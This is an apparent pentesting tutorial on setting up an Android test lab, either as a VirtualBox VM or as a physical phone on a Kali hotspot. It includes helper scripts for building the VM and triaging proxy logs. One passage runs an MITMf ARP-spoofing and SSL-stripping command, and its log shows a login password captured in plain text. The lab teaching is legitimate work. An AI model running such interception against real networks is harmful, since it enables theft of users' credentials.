As bug bounty hunters and penetration testers for Android, we need a properly configured environment to test exploits and find vulnerabilities. This could be an Android virtual operating system or a dedicated network for capturing requests and performing man-in-the-middle attacks.
There are many ways to configure a pentesting lab. Virtual Android environments are made possible by projects such as VirtualBox, OSBoxes, and Android-x86, and there are a few advantages to creating an Android virtual machine on your Kali machine.
Virtual machines (VMs) are very easy to clone and restore if we accidentally break or irreparably damage the Android system. In addition, we can allocate more CPU and memory than is possible with physical Android devices. For example, it is possible to create a virtual Android OS with 32 GB of RAM. Although this value is unbelievably high and unrealistic, it would theoretically allow us to run many applications and services simultaneously.
On the other hand, some readers may not have the available resources (such as RAM and CPU) to run an Android VM. Another environment we can set up requires a physical Android device and a dedicated Wi-Fi network. Sure, we can simply connect Kali and our Android device to our home Wi-Fi network, but we can instead use Kali as a Wi-Fi hotspot and route all Android data through it to easily intercept data to and from the physical device.
There are many conveniences in using a virtualized Android operating system, but it's not really comparable to a real physical phone, which allows a real-world simulation of an Android device's response to a specific exploit or hack. That's why pentesting a physical Android device is my preferred method. But I'll show you how to set up both quickly so you can decide which one best fits your needs.
Virtual Android Environment (VirtualBox Lab)
OSBoxes offers preconfigured Linux operating systems for our convenience. With the OSBoxes Android virtual machines for VirtualBox, we can set up and operate a virtual Android system with just a few clicks.
Go to the Android x86 download page on the OSBoxes website to get the latest 64-bit Android image for VirtualBox.
At the time of writing, OSBoxes supports only Android version 7.1 Nougat. Android Oreo (version 8.1) will be available soon. Readers with a more technical understanding of ISO installations can go to the Android x86 website and download the Oreo ISO file, which is not preconfigured like the OSBoxes images.
Step 2: Extract the VirtualBox Image
Once the Android-x86_7.1_r1-VB-64bit.7z file (or the version you chose) is downloaded, extract the VirtualBox Disk Image (VDI) with the following 7z command. Unzipping the .7z file may take several minutes. When it's done, there will be a new 64bit/ directory in your Downloads/ directory.

    7z x Android-x86_7.1_r1-VB-64bit.7z

    7-Zip 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
    p7zip Version 16.02 (locale=en_DE.UTF-8,Utf16=on,HugeFiles=on,64 bit,4 CPUs AMD Ryzen 7 1700 Eight Core Processor (800F11),ASM,AES-NI)

    Scanning the drive for archives:
    1 file, 927273974 bytes (885 MiB)

    Extracting archive: Android-x86_7.1_r1-VB-64bit.7z
    --
    Path = Android-x86_7.1_r1-VB-64bit.7z
    Type = 7z
    Physical Size = 927273974
    Headers Size = 204
    Method = LZMA2:25
    Solid = -
    Blocks = 1

    Everything is Ok

    Folders: 1
    Files: 1
    Size:       5433720832
    Compressed: 927273974
Step 3: Configure Android VM Settings
Open VirtualBox on your Kali system and create a new virtual machine with the "New" button. If you do not already have VirtualBox, you can download it for free from its website. On the first page, name it "Android" and choose "Linux" as the Type and "Linux 2.6 64-bit" as the Version. Click Next to continue.
Set the RAM to a value of at least 1,024 MB. Click Next to continue.
Select the "Use an Existing Virtual Hard Disk File" option in the Hard Disk settings, then select the Android VDI in the 64bit/ directory that we extracted earlier. Click "Create" to continue.
Then, with the new Android VM selected from the list of machines in VirtualBox, click on "Settings", then the "System" tab, and adjust the Boot Order so that "Hard Disk" is the first option and the Pointing Device is set to "PS/2 Mouse".
Configure "Adapter 1" in the "Network" tab as "Bridged Adapter" and set the adapter type in the "Advanced" menu to "PCnet-FAST III". This will allow the Android VM to connect to your wireless router and get its own IP address.
When you're done, click "OK" and start the Android VM. After about 60 seconds, the operating system starts and we have access to a new virtual Android operating system for experimentation and pentesting.
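The same Step 3 settings can be applied with the VBoxManage command line, which makes the lab easy to rebuild after a broken VM. This is an added example, not part of the original article. It assumes a hypothetical VDI path, `wlan0` as the host interface to bridge to, and a SATA controller; `Linux26_64` and `Am79C973` are VirtualBox's identifiers for the Linux 2.6 64-bit type and the PCnet-FAST III adapter.

```python
import shlex
import subprocess
from pathlib import Path


def android_vm_commands(vdi, bridge_if, name="Android", ram_mb=1024):
    """Build the VBoxManage calls that mirror the GUI steps in Step 3."""
    if ram_mb < 1024:
        raise ValueError("Step 3 asks for at least 1,024 MB of RAM")
    vdi = Path(vdi)
    if vdi.suffix.lower() != ".vdi":
        raise ValueError(f"expected the extracted .vdi image, got {vdi.name}")
    return [
        # New VM, Type "Linux", Version "Linux 2.6 64-bit"
        ["VBoxManage", "createvm", "--name", name,
         "--ostype", "Linux26_64", "--register"],
        # RAM, boot order, PS/2 mouse, bridged PCnet-FAST III adapter
        ["VBoxManage", "modifyvm", name,
         "--memory", str(ram_mb),
         "--boot1", "disk",
         "--mouse", "ps2",
         "--nic1", "bridged",
         "--bridgeadapter1", bridge_if,
         "--nictype1", "Am79C973"],
        # "Use an Existing Virtual Hard Disk File" (controller type assumed)
        ["VBoxManage", "storagectl", name, "--name", "SATA", "--add", "sata"],
        ["VBoxManage", "storageattach", name, "--storagectl", "SATA",
         "--port", "0", "--device", "0", "--type", "hdd",
         "--medium", str(vdi)],
    ]


def build_lab(vdi, bridge_if, dry_run=True):
    """Print the commands, or run them in order when dry_run is False."""
    cmds = android_vm_commands(vdi, bridge_if)
    for argv in cmds:
        if dry_run:
            print(shlex.join(argv))
        else:
            subprocess.run(argv, check=True)  # stop at the first failure
    return cmds


if __name__ == "__main__":
    # Hypothetical path to the image extracted in Step 2.
    build_lab("64bit/android.vdi", "wlan0")
```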
In bridged mode, other devices on the Wi-Fi network can ping and interact with the Android operating system. We can run man-in-the-middle attacks against the operating system as if it were a physical device on the Wi-Fi network. Below is an example of a man-in-the-middle attack with MITMf.
    python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.0.1 --target 192.168.0.4

    [*] MITMf v0.9.8 - 'The dark side'
    |
    |_ Net-Creds v1.0 online
    |_ Spoof v0.6
    |  |_ ARP spoofing enabled
    |_ Sergio Proxy v0.2.1 online
    |_ SSLstrip v0.9 by Moxie Marlinspike online
    |
    |_ MITMf-API online
     * Serving Flask app "core.mitmfapi" (lazy loading)
    |_ HTTP server online
     * Environment: production
       WARNING: Do not use the development server in a production environment.
       Use a production WSGI server instead.
     * Debug mode: off
     * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
    |_ DNSChef v0.4 online
    |_ SMB server online
    2018-07-23 18:26:22 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
    2018-07-23 18:26:22 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
    2018-07-23 18:26:23 192.168.0.4 [type:Chrome-50 os:Android] fonts.googleapis.com
    2018-07-23 18:26:24 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
    2018-07-23 18:26:25 192.168.0.4 [type:Chrome-50 os:Android] Zapped a strict transport security header
    2018-07-23 18:26:26 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
    2018-07-23 18:26:26 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
    2018-07-23 18:26:27 192.168.0.4 [type:Chrome-50 os:Android] fonts.gstatic.com
    2018-07-23 18:26:28 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
    2018-07-23 18:26:48 192.168.0.4 [type:Chrome-50 os:Android] POST data (login.website.com): utf8=%E2%9C%93&authenticity_token=j7bVyOKFLu%2BausgDzlIr0Z9H0Mmh%2FoWSBZh9OyyCqvKNdPFtPL47fqRECBwN97gJmlYt4AgvI6e%2FyDmcAvNeog%3d%3d&users%5Bemail%5D=distortion%40nullbyte.com&users%5Bpassword%5D=secure_password_999&Commit=&users%5Bremember_me%5D=0
    2018-07-23 18:26:49 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
We can see that the Android device (192.168.0.4), running Chrome version 50, sent a POST request containing an e-mail address and password in plain text.
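For the test report, the log format shown above can be turned into findings without copying captured secrets into the write-up. This is an added example, not part of the original article or of MITMf. The sample lines are constructed in the same shape as the output above, and the finding names and the list of secret-looking field names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in the same shape as the proxy log shown above.
SAMPLE_LOG = """\
2018-07-23 18:26:22 192.168.0.4 [type:Chrome-50 os:Android] login.website.com
2018-07-23 18:26:25 192.168.0.4 [type:Chrome-50 os:Android] Zapped a strict transport security header
2018-07-23 18:26:48 192.168.0.4 [type:Chrome-50 os:Android] POST data (login.website.com): utf8=%E2%9C%93&users%5Bemail%5D=tester%40example.com&users%5Bpassword%5D=constructed_pw&users%5Bremember_me%5D=0
"""

LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<client>\S+) "
    r"\[type:(?P<ua>\S+) os:(?P<os>[^\]]+)\] (?P<msg>.*)$"
)
POST = re.compile(r"^POST data \((?P<host>[^)]+)\): (?P<body>.*)$", re.I)
SECRET = re.compile(r"pass|pwd|token|secret", re.I)  # assumed field-name hints


def triage(log_text):
    """Return report-ready findings; secret values are masked, not copied."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # banner and status lines carry no client event
        msg = m["msg"]
        if "strict transport security" in msg.lower():
            # The proxy removed an HSTS header before the browser saw it.
            findings.append({"time": m["ts"], "client": m["client"],
                             "issue": "hsts-header-removed"})
            continue
        post = POST.match(msg)
        if not post:
            continue  # plain host lines are only request noise
        fields = parse_qsl(post["body"], keep_blank_values=True)
        if any(SECRET.search(key) for key, _ in fields):
            masked = {key: "<redacted>" if SECRET.search(key) else value
                      for key, value in fields}
            findings.append({"time": m["ts"], "client": m["client"],
                             "issue": "cleartext-credential-post",
                             "host": post["host"], "fields": masked})
    return findings
```

Both finding types point to the same server-side fix: serve the login host over HTTPS only and have it HSTS-preloaded, so the browser never makes the initial plain-HTTP request that the stripping proxy depends on.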
This method requires a dedicated (physical) Android device for testing and an external Wi-Fi adapter to create a hotspot. The idea is that Kali creates a Wi-Fi hotspot to which the Android device connects. All data transferred to and from the Android device can then be easily monitored without a man-in-the-middle attack. This is convenient for bug bounty hunters who use tools such as Burp Suite or Wireshark to examine packets at a very granular level.
If you do not have an Android phone that you can use as a pentesting device, Amazon has plenty of cheap options for a test phone that will become a valuable asset in your pentesting toolkit.
Step 1: Create a New Wi-Fi Hotspot
To start, start Kali and connect an external Kali-compatible wireless network adapter to the system. Open the Network Connections menu, click the + icon to add a Wi-Fi connection, and then choose Create.
The Network Connections settings vary slightly between the different versions of Kali. I use the XFCE4 version, but all versions have a network manager that can create Wi-Fi hotspots with very similar steps.
Step 2: Configure the Hotspot & Password
A new edit window will pop up. The required fields are SSID, Mode, and Device. Make sure you use the "hotspot" mode and select the device (probably wlan0) of your wireless adapter. If you do not know the name of the network adapter, you can use ifconfig to find out. The Wi-Fi network name (SSID) can be arbitrary. I use "zero byte" for this demonstration.
Next, click on the "Wi-Fi Security" tab and enter a strong password.